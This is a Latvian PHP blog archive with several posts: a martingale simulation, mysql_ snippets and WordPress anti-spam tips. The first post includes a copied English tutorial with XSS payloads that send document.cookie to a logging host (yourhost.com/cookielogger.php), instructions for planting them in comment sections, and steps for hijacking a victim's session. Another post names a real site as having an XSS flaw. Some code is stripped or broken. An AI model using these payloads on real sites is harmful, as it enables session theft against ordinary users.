IT sviestapika » PHP

Kā nodemonstrēt XSS ievainojamību

Kaspars — Sat, 21 Jan 2012 16:02:35 +0000

Ja ir nepieciešams nodemonstrēt kādā veidā var izmantot XSS ievainojamību kādā mājas lapā, tad var izmantot autora izveidoto php skriptu, lai nebūtu jāizveido divritenis no sākuma.

Otrs veids ir izmantot šo pieeju.

Savkārt ievietot jau mājaslapā pārsūtāmo informāciju visbiežāk izdevies izmantojot šo piemēru:

script>
new Image().src=”http://jehiah.com/_sandbox/log.cgi?c=”+encodeURI(document.cookie);

/script>

In computer science, session hijacking refers to the exploitation of a valid computer session—sometimes also called a session key—to gain unauthorized access to information or services in a computer system. In particular, it is used to refer to the theft of a magic cookie used to authenticate a user to a remote server. It has particular relevance to web developers, as the HTTP cookies used to maintain a session on many web sites can be easily stolen by an attacker using an intermediary computer or with access to the saved cookies on the victim’s computer (see HTTP cookie theft).

Here we show how you can hack a session using javascript and php.

What is a cookie?

A cookie known as a web cookie or http cookie is a small piece of text stored by the user browser.A cookie is sent as an header by the web server to the web browser on the client side.A cookie is static and is sent back by the browser unchanged everytime it accesses the server.
A cookie has a expiration time that is set by the server and are deleted automatically after the expiration time.
Cookie is used to maintain users authentication and to implement shopping cart during his navigation,possibly across multiple visits.

What can we do after stealing cookie?

Well,as we know web sites authenticate their user’s with a cookie,it can be used to hijack the victims session.The victims stolen cookie can be replaced with our cookie to hijack his session.

This is a cookie stealing script that steals the cookies of a user and store them in a text file, these cookied can later be utilised.

PHP Code:

Save the script as a cookielogger.php on your server.
(You can get any free webhosting easily such as justfree,x10hosting etc..)

Create an empty text file log.txt in the same directory on the webserver. The hijacked/hacked cookies will be automatically stored here.

Now for the hack to work we have to inject this piece of javascript into the target’s page. This can be done by adding a link in the comments page which allows users to add hyperlinks etc. But beware some sites dont allow javascript so you gotta be lucky to try this.

The best way is to look for user interactive sites which contain comments or forums.

Post the following code which invokes or activates the cookielogger on your host.

Code:

script type=”text/javascript” language=”Java script”>// document.location="http://www.yourhost.com/cookielogger.php?cookie=" + document.cookie;
// ]]>
/script>

Your can also trick the victim into clicking a link that activates javascript.
Below is the code which has to be posted.

Code:

a href=”java script:document.location=’http://www.yourhost.com/cookielogger.php?cookie=’+document.cookie;”>Click here!

Clicking an image also can activate the script.For this purpose you can use the below code.

Code:

img src=”URL OF THE IMAGE” alt=”" />

All the details like cookie,ipaddress,browser of the victim are logged in to log.txt on your hostserver

In the above codes please remove the space in between javascript.

Hijacking the Session:

Now we have cookie,what to do with this..?
Download cookie editor mozilla plugin or you may find other plugins as well.

Go to the target site–>open cookie editor–>Replace the cookie with the stolen cookie of the victim and refresh the page.Thats it!!!you should now be in his account. Download cookie editor mozilla plugin from here : https://addons.mozilla.org/en-US/firefox/addon/573

Don’t forget to comment if you like my post.
by hackiteasy

www.zz.lv un XSS

Kaspars — Mon, 17 Jan 2011 07:00:51 +0000

Mājās drusku pabakstoties atklājās, ka Zemgales ziņas mājas lapas meklēšanas funkcionalitātē ir XSS ievainojamība. Pieņemu, ka tāda pati problēma ir visās AS Dienas reģionālo avīžu mājas lapās.
Pilnībā atvēzēties liedz tas, ka tiek atfiltrēts „=” simbols.
Par XSS var palasīt:

http://hakipedia.com/index.php/Cross_Site_Scripting
http://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
http://ha.ckers.org/xss.html
http://www.martani.net/2009/08/xss-steal-passwords-using-javascript.html

Mainīgo apstrādes kļūda

Kaspars — Mon, 10 Jan 2011 07:00:02 +0000

Intereses vadīts pamēģināju paspēlēties ar vienas mājaslapas mainīgajiem.
Joka pēc sāku ar direktorijas satura iegūšanu “directory listing” – viss kārtībā.

Nākamais solis ievadīt kaut ko ačgārnu, piemēram, www.lapa.tepat/css/abrakadabra, no kura normālā gadījumā vaajdzētu notikt redirektam uz lapas sākumu. Tā vietā man izvada šādu paziņojumu:

Source izksatā,tas izkatās sparotamāk:

Ko tas šinī konkrētā gadījumā dod un ko es varu ar to iesākt?
Konkrētā gadījumā neko daudz, tomēr tas norāda uz to, ka mājaslapā nav par visu padomāts un iespējams ir atstātas vēl kādas kļūdas par kurām netika padomāts. Tāpēc iespējams pameklējot dziļāk var atrast vēl šo un to.

Kļūdu paziņojumā bija vēl viena interesanta lieta-
Izvades teksts līdzīgs šim- “Autorizētiem lietotājiem pieejama daudz plašāka informācija, tajā skaitā ģeogrāfiskā GPS izsekošana” un tas mājaslapā, kuras uzdevums nav nodarboties ar kravas loģistiku.
Tā kā iespējams ir neuzmanīgi izmantotas iestrādes no citiem projektiem.
Google gan meklējot pēc šāda teksta nekas netika atrasts.

Manuprāt šeit kļūda ir tajā, ka pirmais mainīgais sakrita ar direktorijas nosaukumu un līdz ar to notika kļūda mainīgo apstrādē. Par to liecina arī tas, ka ievadot citu direktoriju nosaukumus kļūda ir tāda pati, piemēram http://lapa.aa/images/abrakadabra.

Ko no tā var mācīties?-
Mainīgo pirmapstrādes mehānismā jāparedz gadījums, ka tie var sakrist ar direktoriju nosaukumu.

Vai es neesmu pieļāvis šādu kļūdu kādreiz? Iespējams esmu un tāpēc par kļūdām ir jārunā, lai tās vairs neatkārtotos.

Izraksts no PHP un MySql

Kaspars — Sun, 26 Dec 2010 14:45:35 +0000

Dažas pamat lietas no php.net, lai katru reizi nav jāmeklē kā pārbaudīt vai tabulā ir meklējamie ieraksti.




$conn = mysql_connect("localhost", "mysql_user", "mysql_password");



if (!$conn) {

    echo "Unable to connect to DB: " . mysql_error();

    exit;

}
if (!mysql_select_db("mydbname")) {

    echo "Unable to select mydbname: " . mysql_error();

    exit;

}
$sql = "SELECT id as userid, fullname, userstatus

        FROM   sometable

        WHERE  userstatus = 1";
$result = mysql_query($sql);
if (!$result) {

    echo "Could not successfully run query ($sql) from DB: " . mysql_error();

    exit;

}
if (mysql_num_rows($result) == 0) {

    echo "No rows found, nothing to print so am exiting";

    exit;

}
// While a row of data exists, put that row in $row as an associative array

// Note: If you're expecting just one row, no need to use a loop

// Note: If you put extract($row); inside the following loop, you'll

//       then create $userid, $fullname, and $userstatus

while ($row = mysql_fetch_assoc($result)) {

    echo $row["userid"];

    echo $row["fullname"];

    echo $row["userstatus"];

}
mysql_free_result($result);
?>

PHP funkcija, kas atgriež tekošo URLI

50/50, aizraujošā informātika vai kāpēc nestrādā dubultošanas metode?

Kaspars — Mon, 23 Aug 2010 06:27:01 +0000

Nu tā, šodien pamodos un izdomāju pārbaudīt praksē visiem zināmo patiesību, kāpēc dubultošanas metode (gan kazino- rullete, utt) nestrādā.. vai varbūt strādā?

Man jau liekas loģiski, ja ir divas iespējas (piemēram, sarkans un melns), tad diezgan ātri vajadzētu pienākt reizei kad varētu uzminēt sarkanu vai melnu

Nu ko domāts darīts, vajag izskaitļot cik tad ir iespējams reizes praktiski neuzminēt? (lai saprastu cik vajadzētu $, lai kaut ko vinētu).

Teorija saka, ka katrā reizē iespējams uzminēt 50/50, tas nozīmē, ja neesi uzminējis 10 reizi, tad iespēja uzminēt pareizi 11tajā reizē arī ir tikai 50/50 Bet loģika saka ko citu- cik tad reizes var nepaveikties?

Tāpēc izveidoju simulācijas modeli, kurš noteiks cik reizes ir iespējams pēc kārtas kļūdīties?

Un kādi rezultāti? Interesanti…

Līdz šim biju lasījis vairākus rakstus, kur bija teikts, ka šī metode nestrādā… un kāpēc?

tāpēc, ka, lai pēc vairākām neveiksmes reizēm mēs riskējam ar daudz reiz lielāku summu (pēc dubultošanas), nekā varam iegūt (piemēram, ja sākam ar 5ls, tad pēc 10 neveiksmes reizēm mums jau ir nepieciešams 2560 uz gājienu uzlikt, lai beigās vinnētu tikai 5ls )
jebkurā gājienā uzminēt iespēja ir tikai 50/50
daudzās grāmatās ir rakstīts, ka šī metode strādā, bet tikai līdz vienai reizei, tas nozīmē, ka sākumā var gūt panākumus, bet vienmēr pienāks reize, kad zaudēsiet..

Protams te var runāt par riska apetīti un cik mēs esam gatavi riskēt, lai kaut ko iegūtu, bet ne par to ir stāsts.

Un tam seko rezultāti…

Lai tie maksimāli būtu ticami, eksperimentu atkārtoju z reizes un veicu i reizes..

Kādi rezultāti?

Lai neteiktu vairāk bēdīgi..

Izveidoto skriptu atkārtoju gan uz Linux, gan uz W7 un rezultāti ir gaužām atšķirīgi..

Uz linux pēc kārtas bija iespējams maksimāli neuzminēt 29 reizes..

Uz w7 pēc kārtas bija iespējams maksimāli neuzminēt 14 reizes..

Kāpēc varētu šie rādījumi atšķirties?

Nezinu, iespējams vaina ir rand funkcijā, kura uz win un lin izpildās dažādi.

Sākumā biju izmantojis rand funkciju starp 1 un 2 (rand(1,2)), tad win gadījumā rezultāts bija vēl cerīgāks (max 11 reizes pēc kārtas neuzminēt), bet kad izmainīju algoritmu, lai nosaka vērtību starp 100 un, ja ir zem 50, tad iegūt vērtību 1 un pretēji 2, tad ieguvu 14 reizes un visu laiku vienādu. Linux gadījumā katru reizi rezultāts tomēr mainījās, bet starpību starp rand (1,2) un rand(1,100) nejutu.

Kāpēc es visu šo iesāku? sākumā priekš sevis, lai saprastu, kāda tad ir faktiskā iespēja kļūdīties x reizes pēc kārtas un pēc tam uzskatīju par nepieciešamību parādīt citiem kas Jūs sagaida, ja nolemsiet dubultot..

Kādi tad ir mani secinājumi?

No eksperimenta sanāk, ja tev ir nauda un iespēja (kas rulletē nav, jo ir ierobežojums uz maksimālo likmi) dubultot vismaz vairāk kā 30 reizes sākotnējo likmi, tad karogs tev rokā (bet ņem vērā, ka var arī nepaveikties arī 30 reizē ).

Pretējā gadījumā Jums var paveikties arī vairākas reizes, bet kādreiz pienāks diena Z, kuru labāk nepiedzīvot.
Lūk mans testa modelis:

//izpildes laika aprēķinam $mtime = microtime(); $mtime = explode(" ",$mtime); $mtime = $mtime[1] + $mtime[0]; $starttime = $mtime; // beigas laika aprēķinam echo "Parbaudam varbūtības praktisko pusi";
//ar šo ciklu atkārtosim mērījumus z reizes, lai iegūtu pēc iespējas ticamāku rezultātu $max_max_katra_reize=0; //mainīgais, kurā glabāsies atkārtoto mērījumu gadījumā maksimālais neuzminētais skaits pēc kārtas for ($z=1;$z<=1000;$z++) { $max_katra_reize=0; //mainīgais, kas saturēs maksimālo nesakritības reizi katrā piegājienā (i ciklā, nevis z ciklā) $skaits=0; //cik reizes pec kārtas nesakritīs konkrētā mērījumā (i cikls) $max_skaits=0; //maksimālais skaitlis cik reizes pēc kārtas ir nesakritis konkrētā mērījumā (i cikls) for ($i=1;$i<=100000;$i++){ //cikls, kurš simulēs konkrēto mērījumu $gad1=rand(1,100); $gad2=rand(1,100); if ($gad1<=50){$pimais=1;} else {$pirmais=2;} if ($gad2<=50){$otrais=1;} else {$otrais=2;} /* $pirmais=rand(1,2); //iegūstam pirmo nejaušo vērtību $otrais=rand(1,2); //iegūstam otro nejaušo vērtību */ //echo "$pirmais $otrais "; if ($pirmais!=$otrais){ //ja abas vērtības nesakrīt, tad palielinam pēc kārtas nesakritušo vērtību $skaits=$skaits+1; } if ($pirmais==$otrais){ //ja abas vērtības sakrīt, tad pēc kārtas nesakritušo vērtību nonullējam $skaits=0; } if ($skaits>$max_skaits){ //iegūstam maksimālo nesakritušo vētību katrā mērījumā, lai nav jāizvada viss liekais $max_skaits=$skaits; $max_katra_reize=$max_skaits; //echo " Maksimālais nesakritušo reižu skaits3: $max_katra_reize "; } } //beidzas konkrētā mērījuma cikls (i cikls) //pēc cikla beigām esam ieguvuši maksimālo skaitli $maz_katra_reize, kurā glabājas vērtība cik maksimāli pēc kārtas reizes nesakrita abi skaitļi if ($max_katra_reize>$max_max_katra_reize){ // tagad izvadīsim cik tad bija maksimālais nesakrītības reizes pēc mērījuma un to atkārtojot z reizes pieņemamās pārliecības iegūšanai $max_max_katra_reize=$max_katra_reize; echo "Maksimālais nesakritušo reižu skaits: $max_max_katra_reize "; } } //beidzas atkārtoto mērījumu cikls (z cikls) //laika aprēķinam $mtime = microtime(); $mtime = explode(" ",$mtime); $mtime = $mtime[1] + $mtime[0]; $endtime = $mtime; $totaltime = ($endtime - $starttime); echo "Lapa tika aprēķināta ".$totaltime." sekundēs";
?>

Draugiem.lv pase priekš wordpress

Kaspars — Tue, 20 Apr 2010 05:53:52 +0000

Šorīt no rīta sagribējās izdarīt kaut ko paliekošu un sabiedrībai interesantu.

Pirmais, kas ienāca prāta bija uzrakstīt plugin priekš wordpress, kas ļautu ievietot komentārus ar draugiem.lv pasi.

Tā apņēmības un entuziasma pilns jau ķēros pie darba, kad ienāca prātā iemest google vai kāds meistars jau nav pacenties un vai netaisos izgudrot divriteni otrreiz..

Par nožēlu priekš manis pirmais rezultāts ievadot draugiem.lv pase wordpress izlec Ģirta Upīša rakstītais plugins.

Žēl..

Apskatot pēdējās relīzes (pagaidām divas 1.0 un 1.1) datumu- 2010.04.13 izdaru secinājumu, ka nokavēju tikai nedaudz.

Kāpēc šī ideja neienāca 1 mēnesi atpakaļ?

Nekas domāsim tālāk kā izpausties brīvos brīžos.

Aizstājam vai izmainām izvadāmo kodu izmantojot javascript

Kaspars — Tue, 29 Dec 2009 09:25:23 +0000

Veidojot vienu lapu radās neikdienišķa situācija- bija nepieciešams izmainīt jau php izveidoto kodu un aizstāt to ar citu, ja izvadītajā html kodā ir sastopams cits unikāls kods.

Kā vienīgais risinājums man ienāca prātā javascript.

Iespējams kādam tas liksies gaužām vienkārši, tomēr man, kas ir “uz jūs” ar javascript izveidot šīs pāris rindiņas bija diezgan ķepīgi un laikietilpīgi.

Nu tad, lūk, pati funkcija un paskaidrojumi:

Protams, aizvietošana nenotiks, ja pārlūkā būs atslēgts javascript .

Šo funkciju, nedaudz pamainot, var pielāgot daudz biežāk sastopamai situācijai, kad nepieciešams vienkārši aizstāt vienu rindu ar otru.

Atbrīvojamies no komentāru spama

Kaspars — Tue, 08 Dec 2009 09:24:42 +0000

WordPress piedāvā iebūvētu un vienkāršu veidu kā atbrīvoties no spama- Akisment, kura spēku var palielināt sadaļā:

Iestatījumi->Diskusijas ierakstot papildus frāzes vai IP adreses, kas liecinās par spamu. Dažas adreses, kuras nomocīja mani:

194.8.75.149

194.8.75.163

87.118.118.133

194.8.74.220

92.112.

92.113.

Bet pavisam nejauši uzdūros vecam pods.lv rakstam, kurā vienkārši ieteikts ar javascript palīdzību pamainīt komentu saņemšanas lapas adresi. Piemērs rakstīts wordpress, bet to tik pat vienkārši var pielāgot jebkurai citai lapai.

Kas tādā veidā tiks izdarīts?

Ja nebūs ieslēgts javascript atbalsts, tad ievadot komentāru tas tiks padots citai lapai, piemēram, /spaamms/ nevis comments.php. Tas sniedz rezultātu, jo daudzām spamotāju sistēmām nav ieslēgts javascript.

Lai izskatītos korektāk var arī izveidot šādu lapu ( dll.lv/spaammss), kurā populārzinātniski paskaidrotu, kas noticis.

Papildus tam pirms komentēšanas formas tiks izvadīs paziņojumu, ka jābūt ieslēgtam javascript, lai komentētu.

Lai to izdarītu atrodam wordpress templeita comments.php failu, kas atrodas “web root/wp-content/themes/temas_nosaukums/comments.php”

Atrodam šādu rindiņu:


un aizstājam to ar:







Papildus tam, lai daži spamotāji pa taisno neievietotu komentārus, nomainīju komentāru apstrādājamā faila nosaukumu tai pašā failā:


document.getElementById('commentform').action = "/wp-comments-post.php";

uz:


document.getElementById('commentform').action = "/wp-comments-post_n123.php";

un, protams, tad arī pats komentāru apstrādājošais fails jāpārsauc- atrodas web root/wp-comments-posts.php uz wp-comments-post_n123.php
Es tagad tiešām ceru, ka ar to pietiks…
Related posts:

Lapas redirect
Atbrīvojamies no nevajadzīgā reģistrēšanās spama
Paplašinām wordpress iespējas



Kā izgriezt simbolu no WEB lapas..
Kaspars — Tue, 19 May 2009 18:06:51 +0000
Viena uzdevuma veikšanai vajadzēja izgriezt no mājaslapas un izvadīt simbolu virkni, kas atradīsies starp noteiktiem tagiem(kuri nav XML).

Uz ātro neatradu gatavu risinājumu tāpēc uzrakstīju funkciju.

Nepretendēju uz pašu asprātīgāko risinājumu, bet varbūt kādam noder..
function griezam($Content,$str_pirms,$str_pec){
$garums_pirms=strlen($str_pirms);

$pec = strstr($Content, $str_pirms);

//nogriežam visu lidz sakumama

//nomemam visu lidz firmai

$pec= substr(“$pec”, $garums_pirms);

//nogriežam

$pec1=strstr($pec, $str_pec);
//saskaitam cik ir atlikusaja rinda un pirms nogriezt beigas

$sk_pec=strlen($pec);

$sk_pirms=strlen($pec1);
$sk=$sk_pec-$sk_pirms;
$rezultats=substr(“$pec”, 0,$sk);
echo “$rezultats”;

}
//ierakstam lapu no kuras gribam izgriezt kaut ko
$Content = file_get_contents(“http://dll.lv”);
//ierakstam stringu kas ir pirms vēlamā elementa. Piemers ir vienkārš, tai pat laikā tā vietā var būt piemēram 
,  galvenais, lai tas būtu pirmais unikālais un beidzas pirms vēlamā
$str_pirms=’’;</p>
<p>//ierakstam stringu, kas ir pec velamā elementa</p>
<p>$str_pec = ‘’;
//izsaucam funkciju
griezam($Content,$str_pirms,$str_pec);
Related posts:

Lapas redirect



Lapas redirect
Kaspars — Mon, 17 Nov 2008 12:52:20 +0000
Ja nepieciešams pārsūtīt uz citu lapu tās ielādes laikā, var izmantot php funkciju:
="http://localhost/…";
header ("Location: $URL");

?>
Taču gadījumos, kad jāaizsūta uz citurieni izpildāmā koda vidus daļā(pie noteiktiem notikumiem), nekas neatliek kā izsaukt javascript:
echo “”;
Tas gan nenostrādās, ja pārlūkā būs atslēgts javascript
Related posts:

HTML REDIRECT SEO
PHP funkcija, kas atgriež tekošo URLI